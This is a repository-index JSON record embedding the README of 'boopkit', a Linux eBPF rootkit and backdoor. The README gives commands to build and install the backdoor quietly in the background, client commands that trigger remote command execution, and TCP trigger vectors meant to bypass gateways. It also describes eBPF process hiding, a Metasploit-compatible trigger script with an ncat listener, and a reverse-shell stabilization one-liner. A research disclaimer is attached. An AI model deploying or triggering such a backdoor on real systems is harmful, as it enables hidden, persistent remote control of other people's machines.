{"id":13812663,"url":"https://github.com/krisnova/boopkit","last_synced_at":"2025-05-16T03:03:00.094Z","repository":{"id":37749710,"uuid":"475870202","full_name":"krisnova/boopkit","owner":"krisnova","description":"Linux eBPF backdoor over TCP. Spawn reverse shells, RCE, on prior privileged access. Less Honkin, More Tonkin.","archived":false,"fork":false,"pushed_at":"2023-10-19T07:43:18.000Z","size":909,"stargazers_count":1601,"open_issues_count":13,"forks_count":178,"subscribers_count":31,"default_branch":"main","last_synced_at":"2025-04-08T13:08:39.304Z","etag":null,"topics":["ebpf","linux-kernel-hacking","security","tcp"],"latest_commit_sha":null,"homepage":"","language":"C","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"apache-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/krisnova.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2022-03-30T12:33:29.000Z","updated_at":"2025-04-07T02:07:52.000Z","dependencies_parsed_at":"2024-08-04T04:02:43.997Z","dependency_job_id":"8d68e2d9-10be-4eac-b28c-84455bed0b52","html_url":"https://github.com/krisnova/boopkit","commit_stats":null,"previous_names":[],"tags_count":9,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/krisnova%2Fboopkit","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/krisnova%2Fboopkit/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/krisnova%2Fboopkit/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/krisnova%2Fboopkit/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/krisnova","download_url":"https://codeload.github.com/krisnova/boopkit/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":254459083,"owners_count":22074604,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["ebpf","linux-kernel-hacking","security","tcp"],"created_at":"2024-08-04T04:00:54.280Z","updated_at":"2025-05-16T03:02:55.079Z","avatar_url":"https://github.com/krisnova.png","language":"C","funding_links":[],"categories":["By Industry","C"],"sub_categories":["Security"],"readme":"```\n================================================================\n\n ██████╗ ██████╗ ██████╗ ██████╗ ██╗ ██╗██╗████████╗\n ██╔══██╗██╔═══██╗██╔═══██╗██╔══██╗██║ ██╔╝██║╚══██╔══╝\n ██████╔╝██║ ██║██║ ██║██████╔╝█████╔╝ ██║ ██║ \n ██╔══██╗██║ ██║██║ ██║██╔═══╝ ██╔═██╗ ██║ ██║ \n ██████╔╝╚██████╔╝╚██████╔╝██║ ██║ ██╗██║ ██║ \n ╚═════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝ \n Author: Kris Nóva \u003ckris@nivenly.com\u003e Version 1.4.0\n \n IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE \n LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, \n EXEMPLARY, OR CONSEQUENTIAL DAMAGES. \n\n DO NOT ATTEMPT TO USE THE TOOLS TO VIOLATE THE LAW.\n THE AUTHOR IS NOT RESPONSIBLE FOR ANY ILLEGAL ACTION.\n MISUSE OF THE SOFTWARE, INFORMATION, OR SOURCE CODE\n MAY RESULT IN CRIMINAL CHARGES.\n \n Use at your own risk.\n\n================================================================\n\nBoopkit.\nLinux rootkit and backdoor. Built using eBPF.\n\nUsage: \nboopkit [options]\n\nOptions:\n-h, help Display help and usage for boopkit.\n-i, interface Interface name. lo, eth0, wlan0, etc\n-s, sudo-bypass Bypass sudo check. Breaks PID obfuscation.\n-r, reverse-conn Attempt a reverse RCE lookup if no payload found.\n-q, quiet Disable output.\n-x, reject Source addresses to reject triggers from.\n\n```\n\nLinux backdoor, rootkit, and eBPF bypass tools.\nRemote command execution over raw TCP.\n\n - Tested on Linux kernel 5.16\n - Tested on Linux kernel 5.17\n - Remote code execution over TCP (SSH, Nginx, Kubernetes, etc)\n - Network gateway bypass (bad checksums, TCP reset)\n - Self obfuscation at runtime (eBPF process hiding)\n\n##### Disclaimer\n\n\u003e This is **NOT** an exploit! This requires prior privileged access on a server in order to work!\n\u003e I am a professional security researcher. These are white hat tools used for research purposes only.\n\u003e Use this responsibly. Never use this software illegally.\n\n![FSpgEXTacAYme8t](https://user-images.githubusercontent.com/13757818/168698377-9c1125d6-698d-4009-a599-56b275b54764.jpeg)\n\n## Server Side\n\nDownload and build boopkit.\n\n```bash\nwget https://github.com/kris-nova/boopkit/archive/refs/tags/v1.3.0.tar.gz\ntar -xzf v1.3.0.tar.gz \ncd boopkit-1.3.0/\nmake\nsudo make install\n```\n\nRun boopkit in the foreground. \n\n```bash \n# Reject all boops on localhost and 10.0.0.1\nboopkit -x 127.0.0.1 -x 10.0.0.1\n```\n\nRun boopkit in the background in quiet mode.\n\n```bash \n# Danger! This can be VERY hard to stop! Run this at your own risk!\nboopkit -q \u0026\n```\n\nBoopkit is now running and can be exploited using the client `boopkit-boop` command line tool.\n\n## Client Side\n\nDownload and build boopkit.\n\n```bash\nwget https://github.com/kris-nova/boopkit/archive/refs/tags/v1.2.0.tar.gz\ntar -xzf v1.2.0.tar.gz \ncd boopkit-1.2.0/\nmake\nsudo make install\n```\nRun boopkit-boop against the server.\n\n```bash \n# ===================\nRCE=\"ls -la\"\n# ===================\nLHOST=\"127.0.0.1\"\nLPORT=\"3535\"\nRHOST=\"127.0.0.1\"\nRPORT=\"22\"\nboopkit-boop \\\n -lhost $LHOST \\\n -lport $LPORT \\\n -rhost $RHOST \\\n -rport $RPORT \\\n -c \"$RCE\"\n```\n\n# Boop Vectors\n\nBoopkit will respond to various events on the network. Both of which can be triggered with the `boopkit-boop` tool.\n\nTCP Header Format. Taken from [RFC 793](https://datatracker.ietf.org/doc/html/rfc793#section-3.1). September 1981\n```\n 0 1 2 3\n 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1\n +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n | Source Port | Destination Port |\n +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n | Sequence Number |\n +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n | Acknowledgment Number |\n +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n | Data | |U|A|P|R|S|F| |\n | Offset| Reserved |R|C|S|S|Y|I| Window |\n | | |G|K|H|T|N|N| |\n +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n | Checksum | Urgent Pointer |\n +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n | Options | Padding |\n +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n { data }\n { .... }\n { data }\n +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n```\n\n### 1. Bad Checksum\n\nFirst the `boopkit-boop` tool will send a malformed TCP SYN packet with an empty checksum to the server over a `SOCK_RAW` socket. This will trigger `boopkit` remotely regardless of what TCP services are running. This works against any Linux server running boopkit, regardless of the state of TCP services.\n\nUse `-p` with `boopkit-boop` to only use this first vector.\n\n⚠️ Some modern network hardware will DROP all malformed checksum packets such as the one required to exploit boopkit using this vector!\n\n### 2. Sending ACK-RST packet\n\nNext the `boopkit-boop` tool will complete a valid TCP handshake with a `SOCK_STREAM` socket against a remote TCP service such as SSH, Kubernetes, Nginx, etc. After the initial TCP handshake is complete, `boopkit-boop` will repeat the process a 2nd time.\nThe 2nd handshake will flip the TCP reset flag in the packet, trigger a TCP reset on the server.\n\nEither of these tactics are enough to independently trigger boopkit.\nVarious network hardware and runtime conditions will make either tactic more viable.\nBoopkit will try both, and respond to both by default.\n\n# Boopscript\n\nThe `boopscript` file is a [Metasploit](https://github.com/rapid7/metasploit-framework) compatible script that can be used to remotely trigger the boopkit backdoor after `boopkit-boop` is installed on a remote Linux machine.\n\n```bash\n# boopscript\nRHOST=\"127.0.0.1\"\nRPORT=\"22\"\nLHOST=\"127.0.0.1\"\nLPORT=\"3535\"\n\nNCAT=\"/usr/bin/ncat\"\nNCATLISTENPORT=\"3545\"\n```\n\n### Compile Time Dependencies \n\n - 'clang' \n - 'bpftool' Required for `libbpf`\n - 'xdp-tools' Required for `libxdp`\n - 'llvm'\n - 'pcap'\n - 'lib32-glibc'\n\n### Reverse Shell Stabilization\n\n```bash\npython -c \"import pty; pty.spawn('/bin/bash')\"\n```\n\n### References\n\n - [Tracepoints with BPF](https://lwn.net/Articles/683504/)\n - [Raw TCP Sockets](https://github.com/MaxXor/raw-sockets-example)\n - [Bad BPF](https://github.com/pathtofile/bad-bpf)\n\nCredit to the original authors for their helpful code samples! I forked a lot of code for this project! \n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fkrisnova%2Fboopkit","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fkrisnova%2Fboopkit","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fkrisnova%2Fboopkit/lists"}